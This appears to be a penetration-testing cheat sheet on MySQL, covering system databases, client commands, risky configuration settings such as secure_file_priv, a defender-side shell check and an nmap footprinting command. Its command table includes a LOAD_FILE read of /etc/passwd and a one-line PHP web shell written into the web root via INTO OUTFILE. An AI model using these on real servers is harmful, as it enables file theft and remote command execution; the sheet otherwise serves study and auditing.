MySQL

About

MySQL is an open-source SQL relational database management system developed and supported by Oracle. A database is simply a structured collection of data organized for easy use and retrieval. The default MySQL port is 3306. The most important databases for MySQL are the system schema (sys) and the information schema (information_schema). The system schema contains tables, information, and metadata necessary for management. The information schema contains metadata that is mainly retrieved from the system schema database.

Databases

MySQL has default system databases that can help us understand the structure of all the databases that may be hosted on a target server.

| Database | Description |
| --- | --- |
| mysql | Contains tables with required info for the server |
| information_schema | Database metadata |
| performance_schema | Low-level monitoring of MySQL Server execution |
| sys | Objects that help devs use data from the performance_schema database |

MySQL Useful Commands

| Command | Description |
| --- | --- |
| mysql -u <user> -p<password> -h <IP address> | Connect to the MySQL server. There should not be a space between the '-p' flag and the password. |
| show databases; | Show all databases |
| use <database>; | Select one of the existing databases |
| show tables; | Show all available tables in the selected database |
| show columns from <table>; | Show all columns in the selected table |
| select * from <table>; | Show everything in the desired table |
| select * from <table> where <column> = "<string>"; | Search for the needed string in the desired table |
| select LOAD_FILE("/etc/passwd"); | NOT DEFAULT. Reading local files |
| SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'; | NOT DEFAULT. Writing local files |

CMD Interacting

Linux

mysql -u carni17 -psuperkek123 -h 13.13.13.13

Windows

mysql.exe -u carni17 -psuperkek123 -h 13.13.13.13

Dangerous Settings

Config File Location

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'
  • user - Sets which user the MySQL service will run as

  • password - Sets the password for the MySQL user

  • admin_address - The IP address on which to listen for TCP/IP connections on the administrative network interface

  • debug - This variable indicates the current debugging settings

  • sql_warnings - This variable controls whether single-row INSERT statements produce an information string if warnings occur

  • secure_file_priv - This variable is used to limit the effect of data import and export operations. If empty, the variable has no effect. If NULL, the server disables import and export operations. If set to a directory, import and export are limited to that directory.

Show variable

show variables like "secure_file_priv";
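
A defender-side check for the three secure_file_priv states listed above, as an added example that is not part of the original notes: it reads a mysqld.cnf-style option file and reports which state the setting is in. The helper names and the sample files are made up for illustration; a missing key is reported as UNSET because the server then uses its built-in default.

```shell
#!/bin/sh
# Added example: report the secure_file_priv state of a mysqld.cnf-style file.
# cnf_get and classify_secure_file_priv are hypothetical helper names.

# Print "set:<value>" for the last occurrence of a key, or "unset".
# Comment lines are skipped; "-" and "_" in option names are treated alike.
cnf_get() {
    key_re=$(printf '%s' "$2" | sed 's/_/[-_]/g')
    out=$(grep -v '^[[:space:]]*[#;]' "$1" |
          sed -n -E "s/^[[:space:]]*${key_re}[[:space:]]*(=[[:space:]]*(.*))?\$/set:\2/p" |
          sed -E -e 's/[[:space:]]+$//' -e "s/^set:([\"'])(.*)\1\$/set:\2/" |
          tail -n 1)
    printf '%s\n' "${out:-unset}"
}

# Map the configured value to the states described in the list above.
classify_secure_file_priv() {
    case "$(cnf_get "$1" secure_file_priv)" in
        unset)                 echo "UNSET" ;;         # built-in default applies
        set:)                  echo "UNRESTRICTED" ;;  # empty: variable has no effect
        set:[Nn][Uu][Ll][Ll])  echo "DISABLED" ;;      # NULL: import/export disabled
        set:*)                 echo "RESTRICTED" ;;    # directory: limited to that path
    esac
}

# Constructed sample option files (not taken from a real host).
demo_dir=$(mktemp -d)
printf '[mysqld]\nuser = mysql\n# secure_file_priv = NULL\nsecure-file-priv = ""\n' > "$demo_dir/empty.cnf"
printf '[mysqld]\nsecure_file_priv = NULL\n' > "$demo_dir/null.cnf"
printf '[mysqld]\nsecure_file_priv = /var/lib/mysql-files\n' > "$demo_dir/dir.cnf"
printf '[mysqld]\nuser = mysql\n' > "$demo_dir/unset.cnf"

for f in "$demo_dir"/*.cnf; do
    printf '%s: %s\n' "${f##*/}" "$(classify_secure_file_priv "$f")"
done
```

The value the running server returns for the show variables query stays authoritative, since options can also come from other option files or the command line.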

Tips2Hack

  1. Nmap Basic Footprinting

sudo nmap 13.13.13.13 -sV -sC -p3306 --script mysql*
